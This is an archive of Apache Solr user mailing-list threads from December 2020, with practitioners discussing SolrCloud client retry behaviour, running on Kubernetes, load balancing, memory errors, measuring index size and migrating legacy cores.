> >> to succeed and the system needs to be tolerant of momentary
> >> glitches due to network congestion, reading indexes into memory, etc.
> >> Bypassing that assumption needs some justification….
> >>
> >> Best,
> >> Erick
> >>
> >>> On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
> >> wrote:
> >>>
> >>> Hi,
> >>>
> >>> We have a Solrcloud setup and are using CloudSolrClient, What we are
> >> seeing
> >>> is if socketTimeoutOccurs then the same request is sent to other solr
> >>> server.
> >>>
> >>> So if I set socketTimeout to a very low value say 100ms and my query
> >> takes
> >>> around 200ms then client tries to query second server, then next and so
> >>> on(basically all available servers with same query).
> >>>
> >>> I see that we have *numServersToTry* in LBSolrClient class but not able
> >> to
> >>> set this using CloudSolrClient. Using this we can restrict the above
> >>> feature.
> >>>
> >>> Should a jira be created to support numServersToTry by CloudSolrClient?
> >> Or
> >>> is there any other way to control the request to other solr servers?.
> >>>
> >>> Regards,
> >>> kshitij
> >>
> >>
>
>


Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread Erick Erickson
Right, there are several alternatives. Try going here:
http://jirasearch.mikemccandless.com/search.py?index=jira

and search for “circuit breaker” and you’ll find a bunch
of JIRAs. Unfortunately, some are in 8.8..

That said, some of the circuit breakers are in much earlier
releases. Would it suffice until you can upgrade to set
the circuit breakers?

One problem with your solution is that the query keeps
on running, admittedly on only one replica of each shard.
With circuit breakers, the query itself is stopped, thus freeing
up resources.

Additionally, if you see a pattern (for instance, certain
wildcard patterns) you could intercept that before sending.

Best,
Erick

> On Dec 18, 2020, at 8:52 AM, kshitij tyagi  wrote:
> 
> Hi Erick,
> 
> I agree but in a huge cluster the retries keeps on happening, cant we have
> this feature implemented in client.
> i was referring to this jira
> https://issues.apache.org/jira/browse/SOLR-10479
> We have seen that some malicious queries come to system which takes
> significant time and these queries propagating to other solr servers choke
> the entire cluster.
> 
> Regards,
> kshitij
> 
> 
> 
> 
> 
> On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
> wrote:
> 
>> Why do you want to do this? This sounds like an XY problem, you
>> think you’re going to solve some problem X by doing Y. Y in this case
>> is setting the numServersToTry, but you haven’t explained what X,
>> the problem you’re trying to solve is.
>> 
>> Offhand, this seems like a terrible idea. If you’re requests are timing
>> out, what purpose is served by _not_ trying the next one on the
>> list? With, of course, a much longer timeout interval…
>> 
>> The code is structured that way on the theory that you want the request
>> to succeed and the system needs to be tolerant of momentary
>> glitches due to network congestion, reading indexes into memory, etc.
>> Bypassing that assumption needs some justification….
>> 
>> Best,
>> Erick
>> 
>>> On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
>> wrote:
>>> 
>>> Hi,
>>> 
>>> We have a Solrcloud setup and are using CloudSolrClient, What we are
>> seeing
>>> is if socketTimeoutOccurs then the same request is sent to other solr
>>> server.
>>> 
>>> So if I set socketTimeout to a very low value say 100ms and my query
>> takes
>>> around 200ms then client tries to query second server, then next and so
>>> on(basically all available servers with same query).
>>> 
>>> I see that we have *numServersToTry* in LBSolrClient class but not able
>> to
>>> set this using CloudSolrClient. Using this we can restrict the above
>>> feature.
>>> 
>>> Should a jira be created to support numServersToTry by CloudSolrClient?
>> Or
>>> is there any other way to control the request to other solr servers?.
>>> 
>>> Regards,
>>> kshitij
>> 
>> 



Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi Erick,

I agree, but in a huge cluster the retries keep on happening; can't we have
this feature implemented in the client?
I was referring to this JIRA:
https://issues.apache.org/jira/browse/SOLR-10479
We have seen that some malicious queries come into the system which take
significant time, and these queries propagating to other Solr servers choke
the entire cluster.

Regards,
kshitij





On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
wrote:

> Why do you want to do this? This sounds like an XY problem, you
> think you’re going to solve some problem X by doing Y. Y in this case
> is setting the numServersToTry, but you haven’t explained what X,
> the problem you’re trying to solve is.
>
> Offhand, this seems like a terrible idea. If you’re requests are timing
> out, what purpose is served by _not_ trying the next one on the
> list? With, of course, a much longer timeout interval…
>
> The code is structured that way on the theory that you want the request
> to succeed and the system needs to be tolerant of momentary
> glitches due to network congestion, reading indexes into memory, etc.
> Bypassing that assumption needs some justification….
>
> Best,
> Erick
>
> > On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
> wrote:
> >
> > Hi,
> >
> > We have a Solrcloud setup and are using CloudSolrClient, What we are
> seeing
> > is if socketTimeoutOccurs then the same request is sent to other solr
> > server.
> >
> > So if I set socketTimeout to a very low value say 100ms and my query
> takes
> > around 200ms then client tries to query second server, then next and so
> > on(basically all available servers with same query).
> >
> > I see that we have *numServersToTry* in LBSolrClient class but not able
> to
> > set this using CloudSolrClient. Using this we can restrict the above
> > feature.
> >
> > Should a jira be created to support numServersToTry by CloudSolrClient?
> Or
> > is there any other way to control the request to other solr servers?.
> >
> > Regards,
> > kshitij
>
>


Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread Erick Erickson
Why do you want to do this? This sounds like an XY problem, you
think you’re going to solve some problem X by doing Y. Y in this case
is setting the numServersToTry, but you haven’t explained what X,
the problem you’re trying to solve is.

Offhand, this seems like a terrible idea. If your requests are timing
out, what purpose is served by _not_ trying the next one on the
list? With, of course, a much longer timeout interval…

The code is structured that way on the theory that you want the request
to succeed and the system needs to be tolerant of momentary
glitches due to network congestion, reading indexes into memory, etc.
Bypassing that assumption needs some justification….

Best,
Erick

> On Dec 18, 2020, at 6:23 AM, kshitij tyagi  wrote:
> 
> Hi,
> 
> We have a Solrcloud setup and are using CloudSolrClient, What we are seeing
> is if socketTimeoutOccurs then the same request is sent to other solr
> server.
> 
> So if I set socketTimeout to a very low value say 100ms and my query takes
> around 200ms then client tries to query second server, then next and so
> on(basically all available servers with same query).
> 
> I see that we have *numServersToTry* in LBSolrClient class but not able to
> set this using CloudSolrClient. Using this we can restrict the above
> feature.
> 
> Should a jira be created to support numServersToTry by CloudSolrClient? Or
> is there any other way to control the request to other solr servers?.
> 
> Regards,
> kshitij



solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi,

We have a SolrCloud setup and are using CloudSolrClient. What we are seeing
is that if a socket timeout occurs, the same request is sent to another Solr
server.

So if I set socketTimeout to a very low value, say 100ms, and my query takes
around 200ms, then the client tries to query a second server, then the next, and
so on (basically all available servers with the same query).

I see that we have *numServersToTry* in the LBSolrClient class, but I am not able
to set it using CloudSolrClient. Using it we could restrict the behaviour above.

Should a JIRA be created to support numServersToTry in CloudSolrClient? Or
is there any other way to control the requests to other Solr servers?

Regards,
kshitij


Re: solrcloud with EKS kubernetes

2020-12-16 Thread Jonathan Tan
Hi Abhishek,

We're running Solr Cloud 8.6 on GKE.
3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
configured, all with anti-affinity so they never exist on the same node.
It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
disk usage on each node is ~54gb (we've got all the shards replicated to
all nodes)

We're also using a 200gb zonal SSD, which *has* been necessary just so that
we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
read & write each, and 96MB/s for read & write each)

Various lessons learnt...
You definitely don't want them ever on the same kubernetes node. From a
resilience perspective, yes, but also when one SOLR node gets busy, they
tend to all get busy, so now you'll have resource contention. Recovery can
also get very busy and resource intensive, and again, sitting on the same
node is problematic. We also saw the need to move to SSDs because of how
IOPS bound we were.

Did I mention use SSDs? ;)

Good luck!

On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
wrote:

> Hi Houston,
> Sorry for the late reply. Each shard has a 9GB size around.
> Yeah, we are providing enough resources to pods. We are currently
> using c5.4xlarge.
> XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> No, I haven't run it outside Kubernetes. But I do have colleagues who did
> the same on 7.2 and didn't face any issue regarding it.
> Storage volume is gp2 50GB.
> It's not the search query where we are facing inconsistencies or timeouts.
> Seems some internal admin APIs sometimes have issues. So while adding new
> replica in clusters sometimes result in inconsistencies. Like recovery
> takes some time more than one hour.
>
> Regards,
> Abhishek
>
> On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
> wrote:
>
> > Hello Abhishek,
> >
> > It's really hard to provide any advice without knowing any information
> > about your setup/usage.
> >
> > Are you giving your Solr pods enough resources on EKS?
> > Have you run Solr in the same configuration outside of kubernetes in the
> > past without timeouts?
> > What type of storage volumes are you using to store your data?
> > Are you using headless services to connect your Solr Nodes, or ingresses?
> >
> > If this is the first time that you are using this data + Solr
> > configuration, maybe it's just that your data within Solr isn't optimized
> > for the type of queries that you are doing.
> > If you have run it successfully in the past outside of Kubernetes, then I
> > would look at the resources that you are giving your pods and the storage
> > volumes that you are using.
> > If you are using Ingresses, that might be causing slow connections
> between
> > nodes, or between your client and Solr.
> >
> > - Houston
> >
> > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> > wrote:
> >
> > > Hello guys,
> > > We are kind of facing some of the issues(Like timeout etc.) which are
> > very
> > > inconsistent. By any chance can it be related to EKS? We are using solr
> > 7.7
> > > and zookeeper 3.4.13. Should we move to ECS?
> > >
> > > Regards,
> > > Abhishek
> > >
> >
>


Re: Solrcloud load balancing / failover

2020-12-14 Thread Shalin Shekhar Mangar
No, the load balancing is based on random selection of replicas and
CPU is not consulted. There are limited ways to influence the replica
selection, see 
https://lucene.apache.org/solr/guide/8_4/distributed-requests.html#shards-preference-parameter

If a replica fails then the query fails and an error is returned. I
think (but I am not sure) that SolrJ retries the request on some
specific errors in which case a different replica may be selected and
the request may succeed.

IMO, these are two weak areas of Solr right now. Suggestions/patches
are welcome :-)

On 12/11/20, Dominique Bejean  wrote:
> Hi,
>
> Is there in Solrcloud any load balancing based on CPU load on Solr nodes ?
>
> If for shard a replica fails to handle a query, the query is sent to
> another replica in order to be completed ?
>
> Regards
>
> Dominique
>


-- 
Regards,
Shalin Shekhar Mangar.


Re: solrcloud with EKS kubernetes

2020-12-14 Thread Shalin Shekhar Mangar
FWIW, I have seen Solr exhaust the IOPS burst quota on AWS causing
slow replication and high latency for search and indexing operations.
You may want to dig into CloudWatch metrics and see if you are
running into a similar issue. The default IOPS quota on gp2 is very
low (100?).

Another thing to check is whether you have DNS TTLs for both positive
and negative lookups configured. When nodes go down and come back up
in Kubernetes the address of the pod remains the same but the IP can
change and the JVM caches DNS lookups. This can cause timeouts.
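
As a minimal sketch of capping those TTLs (the property names are the standard
JDK ones; the values are only illustrative), something like this can go into
solr.in.sh:

SOLR_OPTS="$SOLR_OPTS -Dsun.net.inetaddr.ttl=30 -Dsun.net.inetaddr.negative.ttl=5"

The same can be configured JVM-wide by setting networkaddress.cache.ttl and
networkaddress.cache.negative.ttl in the JDK's java.security file.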

On 12/14/20, Abhishek Mishra  wrote:
> Hi Houston,
> Sorry for the late reply. Each shard has a 9GB size around.
> Yeah, we are providing enough resources to pods. We are currently
> using c5.4xlarge.
> XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> No, I haven't run it outside Kubernetes. But I do have colleagues who did
> the same on 7.2 and didn't face any issue regarding it.
> Storage volume is gp2 50GB.
> It's not the search query where we are facing inconsistencies or timeouts.
> Seems some internal admin APIs sometimes have issues. So while adding new
> replica in clusters sometimes result in inconsistencies. Like recovery
> takes some time more than one hour.
>
> Regards,
> Abhishek
>
> On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
> wrote:
>
>> Hello Abhishek,
>>
>> It's really hard to provide any advice without knowing any information
>> about your setup/usage.
>>
>> Are you giving your Solr pods enough resources on EKS?
>> Have you run Solr in the same configuration outside of kubernetes in the
>> past without timeouts?
>> What type of storage volumes are you using to store your data?
>> Are you using headless services to connect your Solr Nodes, or ingresses?
>>
>> If this is the first time that you are using this data + Solr
>> configuration, maybe it's just that your data within Solr isn't optimized
>> for the type of queries that you are doing.
>> If you have run it successfully in the past outside of Kubernetes, then I
>> would look at the resources that you are giving your pods and the storage
>> volumes that you are using.
>> If you are using Ingresses, that might be causing slow connections
>> between
>> nodes, or between your client and Solr.
>>
>> - Houston
>>
>> On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
>> wrote:
>>
>> > Hello guys,
>> > We are kind of facing some of the issues(Like timeout etc.) which are
>> very
>> > inconsistent. By any chance can it be related to EKS? We are using solr
>> 7.7
>> > and zookeeper 3.4.13. Should we move to ECS?
>> >
>> > Regards,
>> > Abhishek
>> >
>>
>


-- 
Regards,
Shalin Shekhar Mangar.


Re: solrcloud with EKS kubernetes

2020-12-13 Thread Abhishek Mishra
Hi Houston,
Sorry for the late reply. Each shard is around 9GB in size.
Yes, we are providing enough resources to the pods. We are currently
using c5.4xlarge.
Xms and Xmx are 16GB. The machine has 32 GB and 16 cores.
No, I haven't run it outside Kubernetes. But I do have colleagues who did
the same on 7.2 and didn't face any issues with it.
The storage volume is gp2, 50GB.
It's not search queries where we are facing inconsistencies or timeouts.
It seems some internal admin APIs sometimes have issues, so adding a new
replica to a cluster sometimes results in inconsistencies, like recovery
taking more than one hour.

Regards,
Abhishek

On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
wrote:

> Hello Abhishek,
>
> It's really hard to provide any advice without knowing any information
> about your setup/usage.
>
> Are you giving your Solr pods enough resources on EKS?
> Have you run Solr in the same configuration outside of kubernetes in the
> past without timeouts?
> What type of storage volumes are you using to store your data?
> Are you using headless services to connect your Solr Nodes, or ingresses?
>
> If this is the first time that you are using this data + Solr
> configuration, maybe it's just that your data within Solr isn't optimized
> for the type of queries that you are doing.
> If you have run it successfully in the past outside of Kubernetes, then I
> would look at the resources that you are giving your pods and the storage
> volumes that you are using.
> If you are using Ingresses, that might be causing slow connections between
> nodes, or between your client and Solr.
>
> - Houston
>
> On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> wrote:
>
> > Hello guys,
> > We are kind of facing some of the issues(Like timeout etc.) which are
> very
> > inconsistent. By any chance can it be related to EKS? We are using solr
> 7.7
> > and zookeeper 3.4.13. Should we move to ECS?
> >
> > Regards,
> > Abhishek
> >
>


Solrcloud load balancing / failover

2020-12-11 Thread Dominique Bejean
Hi,

Is there any load balancing in SolrCloud based on the CPU load of the Solr nodes?

If a shard replica fails to handle a query, is the query sent to
another replica in order to be completed?

Regards

Dominique


Re: SolrCloud crashing due to memory error - 'Cannot allocate memory' (errno=12)

2020-12-10 Thread Walter Underwood
How much RAM do you have on those machines? That message says you ran out.

32 GB is a HUGE heap. Unless you have a specific need for that, run with an 8 GB
heap and see how that works. 
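
A minimal sketch of that change, assuming the standard solr.in.sh startup include:

# in solr.in.sh (or /etc/default/solr.in.sh on a service install)
SOLR_HEAP="8g"
# or, equivalently:
# SOLR_JAVA_MEM="-Xms8g -Xmx8g"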

wunder
Walter Underwood
wun...@wunderwood.org
http://observer.wunderwood.org/  (my blog)

> On Dec 10, 2020, at 7:55 PM, Altamirano, Emmanuel 
>  wrote:
> 
> Hello,
>  
> We have a SolrCloud(8.6) with 3 servers with the same characteristics and 
> configuration. We assigned 32GB for heap memory each, and after some short 
> period of time sending 40 concurrent requests to the SolrCloud using a load 
> balancer, we are getting the following error that shutdown each Solr Server 
> and Zookeeper:
>  
> OpenJDK 64-Bit Server VM warning: Failed to reserve large pages memory 
> req_addr: 0x bytes: 536870912 (errno = 12).
> OpenJDK 64-Bit Server VM warning: Attempt to deallocate stack guard pages 
> failed.
> OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x7edd4d9da000, 
> 12288, 0) failed; error='Cannot allocate memory' (errno=12)
>  
>  
> 20201201 10:43:29.495 [ERROR] {qtp2051853139-23369} [c:express s:shard1 
> r:core_node6 x:express_shard1_replica_n4] 
> [org.apache.solr.handler.RequestHandlerBase, 148] | 
> org.apache.solr.common.SolrException: Cannot talk to ZooKeeper - Updates are 
> disabled.
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.zkCheck(DistributedZkUpdateProcessor.java:1245)
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.setupRequest(DistributedZkUpdateProcessor.java:582)
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.processAdd(DistributedZkUpdateProcessor.java:239)
>  
> 
>  
> We have a one collection with one shard, almost 400 million documents 
> (~334GB).
>  
> $ sysctl vm.nr_hugepages
> vm.nr_hugepages = 32768
> $ sysctl vm.max_map_count
> vm.max_map_count = 131072
>  
> /etc/security/limits.conf
>  
> * - core unlimited
> * - data unlimited
> * - priority unlimited
> * - fsize unlimited
> * - sigpending 513928
> * - memlock unlimited
> * - nofile 131072
> * - msgqueue 819200
> * - rtprio 0
> * - stack 8192
> * - cpu unlimited
> * - rss unlimited #virtual memory unlimited
> * - locks unlimited
> * soft nproc 65536
> * hard nproc 65536
> * - nofile 131072
>  
>  
>  
> /etc/sysctl.conf
>  
> vm.nr_hugepages =  32768
> vm.max_map_count = 131072
>  
>  
> Could you please provide me some advice to fix this error?
>  
> Thanks,
>  
> Emmanuel Altamirano



SolrCloud crashing due to memory error - 'Cannot allocate memory' (errno=12)

2020-12-10 Thread Altamirano, Emmanuel
Hello,

We have a SolrCloud (8.6) cluster with 3 servers with the same characteristics and 
configuration. We assigned 32GB of heap memory to each, and after a short 
period of time sending 40 concurrent requests to the SolrCloud through a load 
balancer, we are getting the following error, which shuts down each Solr server and 
ZooKeeper:

OpenJDK 64-Bit Server VM warning: Failed to reserve large pages memory 
req_addr: 0x bytes: 536870912 (errno = 12).
OpenJDK 64-Bit Server VM warning: Attempt to deallocate stack guard pages 
failed.
OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x7edd4d9da000, 
12288, 0) failed; error='Cannot allocate memory' (errno=12)


20201201 10:43:29.495 [ERROR] {qtp2051853139-23369} [c:express s:shard1 
r:core_node6 x:express_shard1_replica_n4] 
[org.apache.solr.handler.RequestHandlerBase, 148] | 
org.apache.solr.common.SolrException: Cannot talk to ZooKeeper - Updates are 
disabled.
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.zkCheck(DistributedZkUpdateProcessor.java:1245)
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.setupRequest(DistributedZkUpdateProcessor.java:582)
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.processAdd(DistributedZkUpdateProcessor.java:239)


We have one collection with one shard, almost 400 million documents (~334GB).

$ sysctl vm.nr_hugepages
vm.nr_hugepages = 32768
$ sysctl vm.max_map_count
vm.max_map_count = 131072

/etc/security/limits.conf

* - core unlimited
* - data unlimited
* - priority unlimited
* - fsize unlimited
* - sigpending 513928
* - memlock unlimited
* - nofile 131072
* - msgqueue 819200
* - rtprio 0
* - stack 8192
* - cpu unlimited
* - rss unlimited #virtual memory unlimited
* - locks unlimited
* soft nproc 65536
* hard nproc 65536
* - nofile 131072



/etc/sysctl.conf

vm.nr_hugepages =  32768
vm.max_map_count = 131072


Could you please provide me some advice to fix this error?

Thanks,

Emmanuel Altamirano


Re: solrcloud with EKS kubernetes

2020-12-09 Thread Houston Putman
Hello Abhishek,

It's really hard to provide any advice without knowing any information
about your setup/usage.

Are you giving your Solr pods enough resources on EKS?
Have you run Solr in the same configuration outside of kubernetes in the
past without timeouts?
What type of storage volumes are you using to store your data?
Are you using headless services to connect your Solr Nodes, or ingresses?

If this is the first time that you are using this data + Solr
configuration, maybe it's just that your data within Solr isn't optimized
for the type of queries that you are doing.
If you have run it successfully in the past outside of Kubernetes, then I
would look at the resources that you are giving your pods and the storage
volumes that you are using.
If you are using Ingresses, that might be causing slow connections between
nodes, or between your client and Solr.

- Houston

On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra  wrote:

> Hello guys,
> We are kind of facing some of the issues(Like timeout etc.) which are very
> inconsistent. By any chance can it be related to EKS? We are using solr 7.7
> and zookeeper 3.4.13. Should we move to ECS?
>
> Regards,
> Abhishek
>


How can I poll SolrCloud via the API to get the total index size of all shards and replicas?

2020-12-09 Thread Roman Ivanov
Hello! We have a SolrCloud (7.4) cluster consisting of 90+ hosts (each of them
running multiple Solr nodes, e.g. on ports 8983, 8984, 8985), numerous
shards (each having several replicas) and numerous collections.

I was given a task to summarize the total index size (on disk) of a certain
collection. First I calculated it manually from the web interface (via copy-paste)
and there were thousands of lines (the http interface (8983), Cloud -
Nodes tab). It took several hours. Now I think this task needs
some automation. I read the API documentation and googled, but still no
luck... And any possible solution could help somebody else in the future.

What I tried:
   1) If I poll one of the Solr cores via

"
http://solrhost1.somecorporatesite.org:8983/solr/admin/metrics?wt=JSON=INDEX
"

I get output like (**cores.json**):

"responseHeader":{
   "status":0,
"Qtime":2004},
 "metrics":{
   "solr.core.collectionname1-2020-12-05.shard12.replica_n240:{
   "INDEX.size":"456 bytes",
   "INDEX.sizeInBytes":456},
   "solr.core.collectionname2-2020-12-04.shard74.replica_n650:{
   "INDEX.size":"2.88 GB",
   "INDEX.sizeInBytes":3088933801},

... and so on, which is what I need, BUT only for the cores local to that one
host. And there are more than 200 of them.

   2) I can get a list of all collections, shards and replicas via:


http://localhost:8983/solr/admin/collections?action=clusterstatus=json

and it looks like (**collections.json**)

"responseHeader":{
  "status":0,
  "QTime":184},
"cluster":{
  "collections":{
  "collectionname1":{
  "pullReplicas":"0",
  "replicationFactor":"1",
  "shards":{
 "shard1":{
  "range":"8-80e0",
  "state":active",
  "replicas":{
 "core_node67":{
   "core":"collectionname123-2020-11-30_shard1_replica_n54",
   "node_name":"solrhost99.somecorporatesite.org:8985/solr",
   "state":"active",
   "type":"NRT",
   "force_ste_state":"false",
   "leader":"true"},
  "core_node548":{
 "core":"collectionname223-2020-11-29_shard1_replica_n448",
  "node_name":"solrhost77.somecorporatesite.org:8984/solr",
  "state":"active",
  "type":"NRT",
  "force_ste_state":"false"}}},
   "shard2":{
 "range":

... and so on, for 117,156 lines

The question is: how can I insert the INDEX.size fields into the second
output (clusterstatus) in order to calculate the total disk space used by the indices?

In other words, I need the corresponding INDEX.size fields in the replicas
sections of **collections.json**

Currently the whole Solr system consumes 100TB+ and is still growing, and we
need to know the rate of its growth. Many thanks in advance!
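
For reference, one way to automate this is to loop over the live nodes from
CLUSTERSTATUS and sum INDEX.sizeInBytes from each node's metrics endpoint. A
rough sketch, assuming jq is installed and node names have the usual
host:port_solr form (the collection name and starting host are placeholders):

  COLLECTION=collectionname1
  for NODE in $(curl -s 'http://localhost:8983/solr/admin/collections?action=CLUSTERSTATUS&wt=json' \
                  | jq -r '.cluster.live_nodes[]' | sed 's/_solr$//'); do
    # group=core returns one solr.core.<collection>.<shard>.<replica> entry per local core
    curl -s "http://${NODE}/solr/admin/metrics?wt=json&group=core&prefix=INDEX.sizeInBytes" \
      | jq --arg c "$COLLECTION" '[.metrics | to_entries[]
           | select(.key | startswith("solr.core." + $c + "."))
           | .value["INDEX.sizeInBytes"]] | add // 0'
  done | awk '{total+=$1} END {printf "total index size: %.0f bytes\n", total}'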


solrcloud with EKS kubernetes

2020-12-08 Thread Abhishek Mishra
Hello guys,
We are facing some issues (like timeouts, etc.) that are very
inconsistent. Could they be related to EKS by any chance? We are using Solr 7.7
and ZooKeeper 3.4.13. Should we move to ECS?

Regards,
Abhishek


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-12-06 Thread Amy Bai
Hi community,

I created a Solr Jira to track this issue.
https://issues.apache.org/jira/browse/SOLR-15028


Regards,
Amy

From: Radar Lei 
Sent: Friday, November 20, 2020 5:13 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Hi Erick,

I understand this is how the file handler works.

But for the SolrCloud users, they didn't see the expected replica failover 
happens, then we can not say SolrCloud is totally HA enabled. Do we have plan 
to handle the HA for disk failures? Thanks.

Regards,
Radar

From: Amy Bai 
Date: Wednesday, November 11, 2020 at 8:19 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted
Hi Erick,

Thanks for your kindly reply.
There are two things that confuse me:

1. index/search queries keep failing because one of the node data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the Index/search 
queries didn't failover to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy


Re: Migrate Legacy Solr Cores to SolrCloud

2020-12-05 Thread Erick Erickson
First thing I’d do is run one of the examples to insure you have Zookeeper set 
up etc. You can create a collection that uses the default configset.

Once that’s done, start with ‘SOLR_HOME/solr/bin/solr zk upconfig’. There’s 
extensive help if you just type “bin/solr zk -help”. You give it the path to an 
existing config directory and a name for the configset in Zookeeper.

Once that’s done, you can create the collection, the admin UI drop-down will 
allow you to choose the configset. Now you have a collection.

To put data in that collection, it would be best to index the data again. If 
you can’t do that, you MUST have created the collection with exactly one shard, 
replicationFactor=1 (leader-only). Shut down Solr and copy your core’s data 
directory (the parent of the index directory) to “the right place”. You’ll 
overwrite an existing data directory with a name like 
collection1_shard1_replica_n1/data. Do _not_ copy the entire core directory up, 
_just_ recursively copy the “data” dir.

Now power Solr back up and you should be good. You can use the collections API 
ADDREPLICA command to build out your collection for HA/DR.

NOTE: if by “existing” you mean an index created with Solr X-2 (i.e. Solr 6 or 
earlier and assuming you’re migrating to Solr 8) this will not work and you’ll 
have to re-index your data. This is not particular to SolrCloud, Lucene will 
refuse to open the index if it was created with any version of Solr earlier 
than the immediately prior major Solr release, i.e. if the index was _created_ 
with Solr 7, you can do the above if you’re moving to Solr 8. If you’re 
migrating to Solr 7, then if the old index was created with Solr 6 you’ll be 
ok….

Best,
Erick
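
A condensed sketch of that sequence (the collection, configset, ZooKeeper and path
names are placeholders, and it assumes the single-shard, replicationFactor=1 case
described above):

  bin/solr zk upconfig -n myconfig -d /path/to/old/core/conf -z zk1:2181,zk2:2181,zk3:2181
  curl 'http://localhost:8983/solr/admin/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&collection.configName=myconfig'
  bin/solr stop -all
  # overwrite only the data dir of the freshly created replica with the old core's data dir
  cp -r /old/solr/home/oldcore/data/. /var/solr/data/collection1_shard1_replica_n1/data/
  bin/solr start -cloud -z zk1:2181,zk2:2181,zk3:2181
  curl 'http://localhost:8983/solr/admin/collections?action=ADDREPLICA&collection=collection1&shard=shard1'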

> On Dec 4, 2020, at 3:07 PM, Jay Mandal  
> wrote:
> 
> Hello All,
> Please can some one from the Solr Lucene Community Provide me the Steps on 
> how to migrate an existing Solr legacy Core, data and conf(manage 
> schema,solrconfig.xml files to SolrCloud configuration with collections and 
> shards and where to copy the existing files to reuse the data in the solr 
> knowledgebase.
> Thanks,
> Jayanta.
> 
> Regards,
> 
> Jayanta Mandal
> 4500 S Lakeshore Dr #620, Tempe, AZ 85282
> +1.602-900-1791 ext. 10134|Direct: +1.718-316-0384
> www.anjusoftware.com<http://www.anjusoftware.com>
> 
> 
> 
> 
> 
> Confidentiality Notice
> 
> This email message, including any attachments, is for the sole use of the 
> intended recipient and may contain confidential and privileged information. 
> Any unauthorized view, use, disclosure or distribution is prohibited. If you 
> are not the intended recipient, please contact the sender by reply email and 
> destroy all copies of the original message. Anju Software, Inc. 4500 S. 
> Lakeshore Drive, Suite 620, Tempe, AZ USA 85282.



Migrate Legacy Solr Cores to SolrCloud

2020-12-05 Thread Jay Mandal
Hello All,
Can someone from the Solr/Lucene community please provide me with the steps on 
how to migrate an existing legacy Solr core (its data and conf: managed-schema and 
solrconfig.xml files) to a SolrCloud configuration with collections and 
shards, and tell me where to copy the existing files so the data in the Solr 
knowledge base can be reused?
Thanks,
Jayanta.

Regards,

Jayanta Mandal
4500 S Lakeshore Dr #620, Tempe, AZ 85282
+1.602-900-1791 ext. 10134|Direct: +1.718-316-0384
www.anjusoftware.com<http://www.anjusoftware.com>





Confidentiality Notice

This email message, including any attachments, is for the sole use of the 
intended recipient and may contain confidential and privileged information. Any 
unauthorized view, use, disclosure or distribution is prohibited. If you are 
not the intended recipient, please contact the sender by reply email and 
destroy all copies of the original message. Anju Software, Inc. 4500 S. 
Lakeshore Drive, Suite 620, Tempe, AZ USA 85282.


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-20 Thread Radar Lei
Hi Erick,

I understand this is how file handles work.

But SolrCloud users then don't see the expected replica failover 
happen, so we cannot say SolrCloud is fully HA. Is there a plan 
to handle HA for disk failures? Thanks.

Regards,
Radar

From: Amy Bai 
Date: Wednesday, November 11, 2020 at 8:19 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted
Hi Erick,

Thanks for your kindly reply.
There are two things that confuse me:

1. index/search queries keep failing because one of the node data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the Index/search 
queries didn't failover to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

